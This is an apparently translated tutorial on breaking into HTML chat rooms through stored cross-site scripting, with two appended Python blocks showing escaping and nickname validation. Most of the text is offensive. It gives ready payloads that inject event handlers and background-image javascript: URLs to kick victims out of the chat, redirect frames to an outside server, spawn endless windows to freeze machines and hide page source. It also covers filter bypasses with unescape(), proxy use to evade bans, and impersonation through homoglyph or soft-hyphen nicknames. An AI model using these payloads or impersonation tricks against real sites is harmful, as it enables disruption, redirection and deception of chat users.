
Breaking Chat Part 1 (Theory and Practice)





  • This page does not in any way call for illegal activities, "cracking", etc. Its main goal is to study the features of HTML and the prevention of errors associated with its use. The author is not responsible for any illegal use of the information provided. The administration of every chat mentioned was informed by the author of all the errors found.
    All examples cited in the article have been tested and work in MSIE 5.50.4134.0600. I cannot guarantee that they work in other versions, but I am sure that almost all of them will.

    Contents

    Hacking through the nickname (handler without quotes)
    Hacking through the nickname (handler enclosed in quotes)
    Hacking through the nickname (the filter does not pass quotes / the necessary characters)
    Hacking through color (attribute without quotes)
    Hacking through color (attribute with quotes)
    Which characters the filters need to be checked for
    Handler delimiters
    Fake nicks, empty nicks

    General theory

    Here I want to dwell on the basics of hacking chats. I apologize in advance to advanced readers: these methods have long been known and are as old as the world. If you are advanced enough, you can skip to the next chapters.

    First of all, I want to note that each chat is original and unique in its own way (with the exception of replicated copies of one CGI script, of course). Therefore there are no absolutely universal ways of hacking. Almost every chat has features that must be taken into account, and without them stupid templates will not work.

    First of all, what do I actually mean by breaking into an HTML chat? Not trivial flooding, and not attacks on the chat's IP address. By hacking we mean an unauthorized change to the chat's HTML document, or access to its hidden parts (for example, private messages), i.e. an effect on the chat that was not provided for and not permitted to users. This applies equally not only to chats but also to forums, guest books, etc. (where all the described methods also work, and even better, since such forms are as a rule protected worse than chats).

    Everything described applies only to HTML chats. Breaking Java chats is a separate and completely different story. I hope you can tell one type of chat from the other :).

    So, we are on the threshold of an HTML chat. Suppose we want to test it for "strength". What do we do first? First of all, we connect through an anonymous proxy (I hope you know what that is). This is necessary for two reasons: first, it ensures our anonymity (so that the administrator cannot track us down), and second, if the admin does not like our experiments and bans us from the chat, we can switch the proxy to another IP address and re-enter. There is one catch: some chats do not allow entry through public proxies.

    Next, we need to find out what weapons we have, that is, which attributes the user can set. As a rule, in all chats you can enter the user's NICK and COLOR. In addition, it is sometimes possible to set the user's e-mail ("soap" in Russian slang), homepage, gender, the chat refresh rate, etc. In practice the fields of interest are color, nickname, e-mail and homepage: they are inserted directly into the body of the document, and therefore it is through them that the chat can be attacked. Note that some chats require registration; some attributes are then set during registration and others just before entering the chat (or already inside it). Chats with registration are usually more serious and better protected.

    Let us outline the possible ways of hacking. First of all, let us focus on the fragment of the form in which the color of our messages is set (by the way, the color can be set separately for the nickname and for the text of the messages; both need to be checked, since the chat may process them differently). Why are we primarily interested in color? Because the color is placed inside tags, in their parameters, unlike, for example, the nickname, which most often appears in the body of the tags. To break the chat we need to get inside the tag parameters, so that we can change its attributes or insert our script (sometimes, of course, you could write any tags directly in the message text, as was the case until recently at chat.rambler.ru, but that option is so stupid that such chats probably no longer exist, and I do not consider it).

    We are interested in how the color information is sent to the server. The least protected variant is when the color is transmitted as its name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный
    <option value=lightblue>голубой
    </select>

    Such a chat usually breaks to one degree or another :). A worse option is when the color is returned as a numeric code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный
    <option value=#0000AF>голубой
    </select>

    In such a chat there may be filters on all characters except digits, the # sign and the letters A, B, C, D, E and F. Then you will have to forget about breaking through the color.

    And finally, the worst case is when the color is transmitted simply as a number from the list of acceptable colors:

    <select name=youcolor style="width:70px">
    <option value=1>синий
    <option value=2>красный
    <option value=3>т-красный
    <option value=4>зеленый
    <option value=5>черный
    <option value=6>голубой
    </select>

    As a rule, it is impossible to crack such a chat through color (and often impossible at all). This is the most protected option (by the way, I recommend it to chat developers).

    Next, we need to change the HTML code so that we can freely send arbitrary attribute values to the server. To do this, we save the page to our disk and change the chat entry (or registration) form in the following way: we change the relative address in the form's action parameter to the full address, replace all tags of type hidden with type text, and replace select tags with input. In addition, remove any restrictions on the length of the input values (if there are any). For example, if the original form looked like this:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12">
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after the corresponding replacements we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input type="text" name="color">

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that a document may be created dynamically through functions like document.write(); then most likely you will have to convert it to a static form. In addition, it often happens that after saving the HTML to disk the chat does not want to open. This may be because the site was not saved completely if it consisted of frames; in that case you need to study the structure of the page more carefully and save everything correctly. Another reason may be that the server checks the Referer field of the HTTP request header and detects that we are not logging on from its page. In that case other methods are needed, which we dwell on in the chapter "Hacking at the HTTP level".

    Now we can experiment with the chat. First of all, you need to find out what filters there are on the input values (first for color and nickname). We are primarily interested in the following characters:

    " ' ` = < > ; \ & % space

    Enter them in the color field and the nickname, enter the chat (if we are let in with such attributes; if not, we have to go through the characters one by one) and see which characters the filter let through (by writing something like "hello" in the chat and then looking in the HTML source to see which characters of the color and nickname are present). Some chats simply remove filtered characters, some replace them with other characters, and some convert them into an encoded form (an HTML entity such as &lt;). Such transformed characters do not suit us, since HTML does not interpret them as markup (however, see the chapter "A few more hacks of the long-suffering chat T" for more on this).

    As a result, we should have a list of passed characters for each attribute of the registration form.
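As an added example (not code from the article or from any chat), here is how a chat server could render a message line the way the author recommends above: the color chosen by index from a fixed list, the attribute always quoted, and every user-supplied string escaped, including the backtick, which is treated as an attribute delimiter by the IE versions discussed later. The function names, the hex values in the table and the sample inputs are my own constructions.

```python
import html

# Allowed colours, addressed by their position in the <select>, as in the
# article's "worst case" form (value=1 .. value=6). The hex values are a
# constructed mapping, not the chat's own.
COLOR_TABLE = {
    1: "#0000FF",  # синий / blue
    2: "#FF0000",  # красный / red
    3: "#AF0000",  # т-красный / dark red
    4: "#008000",  # зеленый / green
    5: "#000000",  # черный / black
    6: "#ADD8E6",  # голубой / light blue
}


def pick_color(raw):
    """Map the submitted colour value to an entry of COLOR_TABLE.

    Only a plain decimal index is accepted, so values such as
    'red size=20' or '#A0A000 onmouseover=...' never reach the page;
    any other input raises ValueError instead of being passed through.
    """
    if not raw.isdecimal():
        raise ValueError("colour must be a decimal index, got %r" % raw)
    idx = int(raw)
    if idx not in COLOR_TABLE:
        raise ValueError("colour index %d is not in the list" % idx)
    return COLOR_TABLE[idx]


def escape_attr(value):
    """Escape a value that is placed inside a double-quoted attribute.

    html.escape handles & < > " and '; the backtick is added on top
    because, as the article notes, old IE also treated ` as an
    attribute delimiter, so it must not survive unescaped either.
    """
    return html.escape(value, quote=True).replace("`", "&#96;")


def escape_text(value):
    """Escape a value that is placed between tags (element content)."""
    return html.escape(value, quote=False)


def render_line(nick, color_raw, text):
    """Build one message line in the shape chat R used,
    <font color=...><b>nick</b>- text</font>, but with the colour taken
    from the table, the attribute quoted and every user string escaped."""
    color = pick_color(color_raw)
    return '<font color="%s"><b>%s</b>- %s</font>' % (
        escape_attr(color), escape_text(nick), escape_text(text))


def rejected_colors(candidates):
    """Return the candidate colour strings that pick_color refuses."""
    rejected = []
    for raw in candidates:
        try:
            pick_color(raw)
        except ValueError:
            rejected.append(raw)
    return rejected


# Constructed sample input: the colour values the article submits to chat R,
# plus two out-of-range indexes and one legitimate choice.
SAMPLE_COLORS = [
    "red size=20",
    "#A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30",
    "style=background-image:url(javascript:alert('приветик_всем_!!'));",
    "7",
    "-1",
    "2",
]

if __name__ == "__main__":
    print(render_line("Alpha", "2", "Всемприветик !!"))
    for raw in rejected_colors(SAMPLE_COLORS):
        print("rejected:", raw)
```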

    Next we face the task of penetrating some tag in order to change its parameters or insert our own script there. There are two fundamentally different ways to do this. The first is that the code we need is transmitted through attributes that are already inside a tag (that is, between angle brackets), for example through the color or the e-mail address. The second is to break the structure of the HTML code in such a way that the code we need ends up inside a tag. Which way to use is determined by analysing the specific structure of the chat's code and the set of unfiltered characters for our attributes. The following examples consider various hacking options. In the meantime, I would like to highlight some features of HTML that actually make such interesting "effects" possible.

    HTML features

    Here I am not going to lecture on HTML for dummies. I hope you know what a tag and its parameters are, are familiar with JavaScript, and have written at least one web page in your life in HTML (and not in FrontPage).

    The biggest misfortune (and at the same time the power) of HTML is that it has no single standard. That is, there seems to be one, but the standards differ so much, and so many of them are intertwined in HTML, that nobody knows it thoroughly (and often does not even know what it is). In addition, competition among browsers and the heterogeneity of sites leads browsers to try to support the largest possible number of standards and technologies. Moreover, the lack of uniform standards has led to webmasters managing to mix different styles even on one page :-(. However, this is exactly what allows hackers to crack HTML, and gives developers a lot of headaches.

    A simple question: what are the delimiters in HTML and JavaScript? Even I cannot answer this question immediately and unequivocally. Consider an example:

    <font onclick="alert()">Text</font>

    Everything here is clear and obvious: there is a tag with a click event handler written in JavaScript, whose text is enclosed in double quotes. The fact that JavaScript is used can be specified explicitly:

    <font onclick="javascript:alert()">Text</font>

    The string delimiters in these examples are double quotes. However, you can do without them. Since after onclick= only a static handler string can follow, HTML allows the quotes to be omitted (this applies to many cases where the argument can only be a constant string). Thus this construction also works:

    <font onclick=alert()>Text</font>

    and now, instead of an empty message, let us insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    Opening the demo link shows that this example does not work. The reason is this: the body of the handler may be left unquoted, but in that case the first space is considered the end of the handler string (even if the space is itself inside quotes). Therefore the browser takes only the fragment alert('Привет as the handler, and on finding an unclosed quote it reports an error. Why does the browser not notice that the space is inside quotes? I think the reason is that two languages are mixed here: HTML and JavaScript. The browser "saw" that there is no quotation mark after the = sign and therefore started looking for a space as the end of the handler. At that moment the interior of the handler did not interest it, because that belongs not to HTML but to JavaScript. So it simply did not notice the opening quote and took the space as the end of the parameter value. The following constructions work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Note an important feature: if the value of a tag parameter is in quotes, the space before the next parameter can be omitted (the third line of the example). The fourth line also works (in the sense that the browser does not complain, though the script of course does not run), because the browser does not treat the contents of the color attribute as JavaScript and therefore does not complain about the unclosed quote, although only alert('Привет reaches it (an arbitrary string can serve as a color in HTML; the browser converts the string into some numeric value which it treats as the color).

    Whether there are other characters that delimit an unquoted handler (besides the space and the > character) is an open question. I do not know of any, but I admit they may exist.

    As you can see from the examples, double and single quotes can be used as string delimiters. This applies equally to HTML and JavaScript; however, it turns out there is at least one more character that is a string delimiter in HTML (but not in JavaScript!). This is the backtick ` (usually on the same key as the letter Ё). See the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I swear that at least 90% of webmasters do not know about it! In any case, I have not yet seen anyone use the backtick. This character is a find for a hacker :).

    It often happens that you need to use one kind of quotes inside another. This is difficult, especially if the chat only lets one kind of quote through. But it turns out that JavaScript lets you insert string constants inside other string constants while using the same quotes! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, but the interpreter does not produce an error. I note that the contents of the inner quotes are not arbitrary: there must be no spaces, and some characters are not allowed at the end, for example ; or ).

    Now let us talk about links. First it is necessary to note one detail: the Internet developed in such a way that completely different technologies were mixed in it. Information can be accessed through a large number of different protocols. Therefore, when specifying the full path to a document (URL), any protocol known to the browser may be given. It is noteworthy that javascript is also treated as a protocol (although it is not one; apparently the developers decided it would be too bold to allocate a separate concept for scripts, and added it to the protocols). Therefore, wherever a URL can be specified in an HTML document, a script can be inserted, and this script will be executed as soon as the user (or the browser itself) requests the link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, besides statements, a javascript: link can simply contain a string (or numeric) value (but always after the statements, if there are any). When such a link is clicked, the browser first executes the leading statements, and then opens a new document and puts the value of the last string in the link into it:

    <a href=javascript:alert();'Hello!!'>Text</a>

    I note that tags cannot be inserted into the new page this way.

    Breaking chat R

    I will give an example of one of the first chats I hacked. This chat was very simple and cracked, as they say, on the first try :).

    True, there are few chats left now in which this passes. Although I thought of these methods myself, I later found them in hacker magazines.

    The input form of this chat corresponded exactly to the form given in the chapter "General theory". After converting the form and saving it to disk, I checked which characters pass in the color attribute. It turned out that the following characters pass (of those that interest us, see the chapter "General theory"):

    ' ` = ; % space

    And of course all digits and letters passed. The length of the color value string was not limited. Next I looked at exactly where the color is inserted in the message frame. Here is a fragment of this frame:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    As you can see, the color is inserted without surrounding quotes. That suited me. I logged in under the nickname Shram (or almost that nickname ;)) with the color red size=20. My message looked like this:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was displayed in a very large font, which somewhat surprised the chat population :).

    Thus, although we cannot insert tags directly, being allowed to enter a space in the color attribute let us set unauthorized tag parameters. However, this was certainly not enough for me. Changing the font size is cool, of course, but anything really useful can only be done with scripts. I could not insert a script tag directly (or rather, at the time I did not know how to). But I could specify a handler for any event of the tag. Here is the color I set in order to throw some idiot out of the chat:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. Then I sent him a long, long message in private. I chose the color of the message so that it did not differ from the background color, and the font size and the length of the message were so huge that the victim almost certainly passed the mouse over the message at least once, whereupon my onmouseover handler pressed the "leave chat" button for him :).

    However, gradually there appeared clever people who caught on to the trick and deliberately did not drag the cursor over the chat window. My script did not always work :(. At first I thought there was no way out: since I can only insert a script as an event handler, if the event does not occur, the script does not run. But, having rummaged through the "annals", I found a solution (which has now become trivial and widely known). It turned out that you can specify the URL of a background image for a tag in the style attribute. And where you can specify a URL, you can also write a script. And most importantly, the background image is loaded after the HTML document has finished loading! If I wanted to show an alert to the chat participants, I logged in with the following color:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    An important detail should be noted: since most HTML chats are structured so that the page is refreshed regularly, a script sent this way is executed not once but many times, until our message disappears from the screen.

    And here is what the color attribute value for throwing someone out of the chat now looked like:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    It must be remembered: a script sent in private will be seen not only by your "interlocutor" but by you as well, so you need to know how to protect yourself from the script. This can be done in two ways: either put yourself on ignore (then we will not see our own messages), or disable the display of pictures in the browser settings. Then a script triggered through the background image will not work.

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript:navigate('http://myserver.ru'); - loads the site myserver.ru into the current frame (or page).
    Some chats, on seeing the fragment http://, treat it as a link and automatically insert an <a> tag. Since this would destroy our script, it must not be allowed to happen. To do this, simply omit the http: prefix (which is the default anyway). Then the script looks like: javascript:navigate('//myserver.ru'); . The two leading slashes are required.

    javascript:parent.frames[2].document.location='http://myserver.ru' - loads the site myserver.ru into one of the frames.

    javascript:for(;;)open() - opens an infinite number of windows (if you do not leave the page in time, it makes the machine freeze and then reboot).

    javascript:document.write('<script>alert()</script>') - replaces the current frame with a script that is then executed. Note: if the chat does not pass the characters < and > (and that is the overwhelming majority of chats), we cannot insert such a script directly. But there is a way out: the unescape() function, which converts the code of a character into the character. Replacing the angle brackets with unescape() calls with the corresponding codes, our script looks like this:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E'))

    javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - inserts a picture after the text. I note that in IE 5.x you can insert any tag except FRAME, IFRAME and SELECT. In IE 4.x the createElement() function only allows inserting IMG, AREA and OPTION tags. I have no information about Netscape; you can experiment yourself.

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' - blocks the page's context menu, and therefore makes it impossible to view the HTML source of the frame. Thanks to this you can hide your tricks with the chat body :).

    Fake nicks, empty nicks

    Sometimes it is useful to log in under someone else's nickname. Chats with a user registration system will not let you do this if you do not know the password (and most likely you do not). The banal way out: register a nickname in which a letter of the Latin alphabet is replaced by a very similar letter from the Russian layout. For example, log in as admin with the Latin letter a replaced by the Russian а. The method is primitive, but it works :). There are also harder cases: for example, some chats prohibit mixing characters from different layouts in one nickname. Then the inquiring mind has nothing left but to turn to Uncle Gates for help. And here, in its human kindness, Microsoft has not forgotten about us sinful users and has given us the soft hyphen character (&shy;, also written as %AD), which Microsoft itself calls "Soft hyphen". It really looks like a hyphen in Word, in Excel, and even in Notepad, but not in IE! For Internet Explorer it simply does not exist; that is, it seems to be there, but they forgot to make a graphic representation for it, so it simply does not appear on the HTML page! Thus, by adding a soft hyphen to any nickname and registering under it, we enter the chat with a nickname that looks on the HTML page exactly like the nickname without the hyphen. And it can be done even more steeply: log in under a nickname consisting only of soft hyphen characters. Then your nickname will not be displayed in the chat at all, an absolutely empty space :).

    (Note: having played a bit more with the soft hyphen character, I did find cases when it appears: it appears only as a hyphenation character. That is, if there is a soft hyphen inside a word and that word is at the end of a line, the part of the word after the hyphen may be moved to the next line, and the hyphen itself becomes visible! Thus the invisibility of the hyphen is probably a deliberate feature of Microsoft (which, incidentally, does not diminish its usefulness for cracking :) ). Though it is not clear why it still remains always visible in other applications.)
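An added example, not part of the article, of the nickname checks a registration system could apply against the two tricks just described: it rejects names containing the soft hyphen (and other invisible format characters), names that mix alphabets, and names that collide with a registered one after folding look-alike Cyrillic letters to Latin. The function names, the look-alike table and the sample nicknames are my own constructions.

```python
import unicodedata

SOFT_HYPHEN = "\u00ad"

# Cyrillic letters that look like Latin ones in most fonts (constructed list;
# the "admin" with a Russian а from the article is the first entry).
CYRILLIC_LOOKALIKES = str.maketrans({
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x", "у": "y",
    "А": "A", "В": "B", "Е": "E", "К": "K", "М": "M", "Н": "H", "О": "O",
    "Р": "P", "С": "C", "Т": "T", "Х": "X",
})


def strip_invisible(nick):
    """Remove the soft hyphen and every other format character (Unicode
    category Cf, e.g. zero-width spaces), so that a name made only of them
    collapses to the empty string."""
    return "".join(ch for ch in nick
                   if ch != SOFT_HYPHEN and unicodedata.category(ch) != "Cf")


def scripts_used(nick):
    """Return the set of scripts the letters of nick belong to,
    e.g. {'LATIN'} or {'LATIN', 'CYRILLIC'}."""
    scripts = set()
    for ch in nick:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def skeleton(nick):
    """Fold look-alike Cyrillic letters to Latin and lower-case the result,
    giving a key on which a registered name and its impostor collide."""
    return strip_invisible(nick).translate(CYRILLIC_LOOKALIKES).lower()


def registration_problem(nick, registered):
    """Check a nickname offered for registration against the already
    registered names. Returns None if it is acceptable, otherwise a
    short reason string."""
    if strip_invisible(nick) != nick:
        return "contains invisible characters"
    if not nick.strip():
        return "empty nickname"
    if nick in registered:
        return "already taken"
    if len(scripts_used(nick)) > 1:
        return "mixes letters from different alphabets"
    taken = {skeleton(name) for name in registered}
    if skeleton(nick) in taken:
        return "looks like a registered nickname"
    return None


# Constructed sample: two registered users and the tricks the article lists.
REGISTERED = {"admin", "Ace"}
SAMPLE_NICKS = [
    "admin",                       # exact duplicate
    "\u0430dmin",                  # Cyrillic а instead of Latin a
    "\u0410\u0441\u0435",          # all-Cyrillic look-alike of "Ace"
    "ad" + SOFT_HYPHEN + "min",    # soft hyphen hidden inside
    SOFT_HYPHEN * 3,               # nickname made only of soft hyphens
    "Algol",                       # fine
]

if __name__ == "__main__":
    for nick in SAMPLE_NICKS:
        print(repr(nick), "->", registration_problem(nick, REGISTERED))
```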


